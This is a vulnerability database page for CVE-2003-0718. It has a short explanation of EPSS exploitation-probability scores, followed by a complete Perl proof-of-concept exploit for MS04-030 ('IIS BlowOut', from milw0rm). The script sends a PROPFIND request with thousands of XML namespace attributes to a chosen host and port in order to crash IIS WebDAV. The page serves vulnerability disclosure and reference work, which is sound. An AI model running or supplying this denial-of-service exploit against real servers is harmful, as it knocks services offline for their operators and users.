CVE-2003-0718 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

#!/usr/bin/perl # IIS BlowOut # POC exploit for MS04-030. Found by Amit Klein. # incognito_ergo yahoo com # usage: perl ms04-030_spl.pl host port use IO::Socket; $port = @ARGV[1]; $host = @ARGV[0]; $socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto => "TCP"); for ($count=1; $count<9999; $count++) #more than nuff { $xmlatt = $xmlatt. "xmlns:z" . $count . "=\"xml:\" "; } $xmldata = "<?xml version=\"1.0\"?>\r\n<a:propfind xmlns:a=\"DAV:\" " . $xmlatt . ">\r\n<a:prop><a:getcontenttype/></a:prop>\r\n</a:propfind>\r\n\r\n"; $l=length($xmldata); $req="PROPFIND / HTTP/1.1\nContent-type: text/xml\nHost: $host\nContent-length: $l\n\n$xmldata\n\n"; syswrite($socket,$req,length($req)); close $socket; # milw0rm.com [2004-10-20]